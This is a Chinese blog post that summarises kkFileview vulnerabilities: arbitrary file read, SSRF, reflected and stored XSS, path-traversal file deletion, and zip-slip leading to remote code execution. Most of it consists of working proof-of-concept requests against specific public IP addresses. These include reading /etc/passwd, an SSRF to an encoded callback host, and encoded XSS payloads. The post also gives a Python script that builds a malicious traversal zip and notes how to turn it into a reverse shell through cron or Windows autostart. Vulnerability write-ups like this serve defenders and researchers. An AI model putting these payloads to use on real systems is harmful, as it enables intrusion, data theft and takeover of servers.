kkFileview漏洞总结

项目介绍

Keking KkFileview是中国凯京科技(Keking)公司的一个以Spring Boot打造文件文档在线预览项目

1-任意文件读取漏洞

影响版本

kkFileview <=3.6.0

漏洞证明

http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd

2-SSRF漏洞

影响版本

kkFileview =v4.1.0

漏洞证明

http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn

3-XSS漏洞

漏洞影响

kkFileview =v4.1.0

漏洞证明

http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20οnerrοr=alert(0)%3E

http://www.baidu.com/test.txt"><img src=111 οnerrοr=alert(1)>
编码base64:
aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg==
url编码:aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

<svg/οnlοad=alert(1)>
编码base64:
PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+
url编码:
PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

http://119.91.146.127:8012/picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

4-任意文件上传导致存储xss

漏洞影响

kkFileView=4.1.0

漏洞证明

访问上传的文件
http://139.9.101.60:8012/demo/2.html

5-任意文件删除

漏洞影响

kkFileview= v4.0.0

漏洞证明

/deleteFile?fileName=demo%2F..\xss.pdf
get请求此uri会删除\kkFileView-master\server\src\main\file目录中的xss.pdf(原本只能删除\kkFileView-master\server\src\main\file\demo目录下的文件)

6.任意文件上传导致远程执行漏洞

漏洞影响

4.2.0-4.4.0

漏洞证明 

制作恶意hack.zip,注意里面必须有一个正常文件,例如test,便于创建hack.zip_缓存文件

这个poc的含义是在指定文件/AAA/flag中写入test_Yu9

import zipfile

if __name__ == "__main__":
    try:
        binary1 = b'test'
        binary2 = b'test_Yu9'
        zipFile = zipfile.ZipFile("hack.zip", "a", zipfile.ZIP_DEFLATED)
        info = zipfile.ZipInfo("hack.zip")
        zipFile.writestr("test", binary1)
        zipFile.writestr("../../../../../../../../../../../../../../../../../../../AAA/flag", binary2)
        zipFile.close()
    except IOError as e:
        raise e

上传压缩包并点击预览

  • 在linux下且高权限的情况下,可以通过写入计划任务反弹shell。
  • 在windows下高权下可以通过写自启动 的方式getshell。

参考

kkFileView漏洞总结(转) - 小白不太黑 - 博客园 (cnblogs.com)

kkFileView 4.2.0-4.4.0 任意文件上传导致远程执行漏洞分析 - 先知社区 (aliyun.com)

  • 23
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值